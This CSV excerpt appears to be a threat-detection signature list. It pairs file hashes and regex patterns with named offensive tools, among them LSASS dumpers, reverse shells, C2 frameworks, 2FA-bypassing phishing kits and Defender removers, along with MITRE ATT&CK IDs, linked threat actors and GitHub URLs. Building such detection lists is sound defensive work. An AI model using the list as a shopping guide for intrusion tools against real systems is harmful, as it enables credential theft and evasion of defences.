"*7cd4a538c3d1242ede7dcbea8dfdba84031e232e4327ed3c89292714032da91c*",".{0,1000}7cd4a538c3d1242ede7dcbea8dfdba84031e232e4327ed3c89292714032da91c.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","29639" "*7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535*",".{0,1000}7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","29640" "*7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b*",".{0,1000}7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","29641" "*7ce28732993dacc199e5f96517aa1d16305c86c623a0e17f9923838e3fa06133*",".{0,1000}7ce28732993dacc199e5f96517aa1d16305c86c623a0e17f9923838e3fa06133.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","29644" "*7ce381dbed6df3b62ed0750d769effd075de2fac130236519b76c6c010729747*",".{0,1000}7ce381dbed6df3b62ed0750d769effd075de2fac130236519b76c6c010729747.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29645" "*7ce39a5eee1a1a1929de2abead9ee1d5a4182978cf6f2e23e30e44784d2c47c0*",".{0,1000}7ce39a5eee1a1a1929de2abead9ee1d5a4182978cf6f2e23e30e44784d2c47c0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29646" "*7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f*",".{0,1000}7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#filehash","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","29647" "*7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc*",".{0,1000}7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29648" "*7CEC7793-3E22-455B-9E88-94B8D1A8F78D*",".{0,1000}7CEC7793\-3E22\-455B\-9E88\-94B8D1A8F78D.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","#GUIDproject","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","29650" "*7cf1f7f7e6bf8b26c5c3a6c3b1a6b0316eaea86e0b2b39dc762d510b75f4709a*",".{0,1000}7cf1f7f7e6bf8b26c5c3a6c3b1a6b0316eaea86e0b2b39dc762d510b75f4709a.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","29651" "*7cf44a7d8433e4e8dd538377de04c249639787d7427a7beddc2236237edf2b9f*",".{0,1000}7cf44a7d8433e4e8dd538377de04c249639787d7427a7beddc2236237edf2b9f.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29652" "*7cfb2df4376d51979916036569f38f42bb862d122b708e3531f16ecc6db08e71*",".{0,1000}7cfb2df4376d51979916036569f38f42bb862d122b708e3531f16ecc6db08e71.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29653" "*7CFC52.dll*",".{0,1000}7CFC52\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","29654" "*7CFC52CD3F.dll*",".{0,1000}7CFC52CD3F\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite 
scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","29655" "*7d043db474ba220857a9290cfd11fd6c3fd42cb39e8be1b03084840bc0320d17*",".{0,1000}7d043db474ba220857a9290cfd11fd6c3fd42cb39e8be1b03084840bc0320d17.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29656" "*7d057f377006dfa3f88af8ef1f3d90a9e28d7ce83c5854988865c7fbd62963d0*",".{0,1000}7d057f377006dfa3f88af8ef1f3d90a9e28d7ce83c5854988865c7fbd62963d0.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","29657" "*7d1d37cb68ec4db1391f165074fed471b6a67f1948abeb26751796fad8746640*",".{0,1000}7d1d37cb68ec4db1391f165074fed471b6a67f1948abeb26751796fad8746640.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","29660" "*7d251c4c6b137a24214a9f58a0b88f2eedad23d0d62050f36a567b78cb2ef497*",".{0,1000}7d251c4c6b137a24214a9f58a0b88f2eedad23d0d62050f36a567b78cb2ef497.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29661" "*7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3*",".{0,1000}7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after 
the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29663" "*7d2a1f11107cf703d1bc2eb6cf4e2627d1eec923852b4a3230b7e79ca2542587*",".{0,1000}7d2a1f11107cf703d1bc2eb6cf4e2627d1eec923852b4a3230b7e79ca2542587.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","29664" "*7d2dfbf053a420ad3857171642cbec5738196a0ead931f93737d16e14b7faec4*",".{0,1000}7d2dfbf053a420ad3857171642cbec5738196a0ead931f93737d16e14b7faec4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","29665" "*7d3429af6ef46337888e2671bdae37cd6270a40ea02fedd0999530cecf1fc67d*",".{0,1000}7d3429af6ef46337888e2671bdae37cd6270a40ea02fedd0999530cecf1fc67d.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","29666" "*7d3a5a08c0a08593371527c2e26ebb05907adf47883de46e21bb8118214d9399*",".{0,1000}7d3a5a08c0a08593371527c2e26ebb05907adf47883de46e21bb8118214d9399.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29668" "*7D430DB8006F611817143F28D8141BBDB3291348455FB0C53E9EEBE59E890695*",".{0,1000}7D430DB8006F611817143F28D8141BBDB3291348455FB0C53E9EEBE59E890695.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","29669" "*7d46566153850560ca31a36edd46a33728d6c2422f9a9fec8efece7f74642f0b*",".{0,1000}7d46566153850560ca31a36edd46a33728d6c2422f9a9fec8efece7f74642f0b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29670" 
"*7d4d612275a6f4c3d1b0d23c3ae19cf39fcdd729f3f899f3df44b619bea7e17b*",".{0,1000}7d4d612275a6f4c3d1b0d23c3ae19cf39fcdd729f3f899f3df44b619bea7e17b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","29672" "*7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe*",".{0,1000}7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29673" "*7d5785c1760909ac5dc68ce57aabcf86af2444ae42e19b568eb1e32d8a414913*",".{0,1000}7d5785c1760909ac5dc68ce57aabcf86af2444ae42e19b568eb1e32d8a414913.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29674" "*7d621fe424daf7ca2a90cc1167ae8a9fc8eca96c82821acf6a2fa3fe7683603c*",".{0,1000}7d621fe424daf7ca2a90cc1167ae8a9fc8eca96c82821acf6a2fa3fe7683603c.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","29677" "*7d65bb1ac457f40d6b4fa1b6ccbcba7e153940568b50d7119fc3135cdb6ecbab*",".{0,1000}7d65bb1ac457f40d6b4fa1b6ccbcba7e153940568b50d7119fc3135cdb6ecbab.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29678" "*7d6717ec16ee8a51b0fc81d5c762f8735211d13c8be9476c2e75c3f5ae42a478*",".{0,1000}7d6717ec16ee8a51b0fc81d5c762f8735211d13c8be9476c2e75c3f5ae42a478.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29679" "*7d675410e845e1f645226deca1725ff724df5a61d3235b3e3af3d0b1d4090cf8*",".{0,1000}7d675410e845e1f645226deca1725ff724df5a61d3235b3e3af3d0b1d4090cf8.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of 
tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","29680" "*7d67b3f5a0eae10e93d144bd9dba056c77d14b3246aa86ca20d8de02b3f1c674*",".{0,1000}7d67b3f5a0eae10e93d144bd9dba056c77d14b3246aa86ca20d8de02b3f1c674.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","29681" "*7d682fa901e31cc0a7196c4588f434ab88e0dc26c37dfde27f6b31849abc3283*",".{0,1000}7d682fa901e31cc0a7196c4588f434ab88e0dc26c37dfde27f6b31849abc3283.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29682" "*7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c*",".{0,1000}7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29683" "*7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c*",".{0,1000}7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","29684" 
"*7d87848076e10ed06f0a178bfae29e07d10c2d8831c0b4a5c6865b950fb2635c*",".{0,1000}7d87848076e10ed06f0a178bfae29e07d10c2d8831c0b4a5c6865b950fb2635c.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","29688" "*7d90e68af91d2670512ca9db8d6c6d1055007918ca637b9ae54f39f0380ad2e3*",".{0,1000}7d90e68af91d2670512ca9db8d6c6d1055007918ca637b9ae54f39f0380ad2e3.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","29689" "*7d98c9c00f9813e45f807b3d5779c10e38b4191ad8e7c25669c0c7a3e3ce3cda*",".{0,1000}7d98c9c00f9813e45f807b3d5779c10e38b4191ad8e7c25669c0c7a3e3ce3cda.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29692" "*7d9c98819d1866c8ecba316b650dab266a1d5bcc48bb7eba0ef147ad487dfff2*",".{0,1000}7d9c98819d1866c8ecba316b650dab266a1d5bcc48bb7eba0ef147ad487dfff2.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","29693" "*7da1b05ebb0a51e4160ea04db4f70b6e710c14546d5a13169942e4d686bdc477*",".{0,1000}7da1b05ebb0a51e4160ea04db4f70b6e710c14546d5a13169942e4d686bdc477.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","29694" "*7da296b4276a84298ef0a70aa516dc49dad526cecf21094d5b2aa42651a25c86*",".{0,1000}7da296b4276a84298ef0a70aa516dc49dad526cecf21094d5b2aa42651a25c86.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29695" 
"*7da421d00cd50570a79a82803c170d043fa3b2253ae2f0697e103072c34d39f1*",".{0,1000}7da421d00cd50570a79a82803c170d043fa3b2253ae2f0697e103072c34d39f1.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29696" "*7da54ac68e35d2604980ef414a6ec8b696bf6ec5df2b32ad7596bee48db883c6*",".{0,1000}7da54ac68e35d2604980ef414a6ec8b696bf6ec5df2b32ad7596bee48db883c6.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","29697" 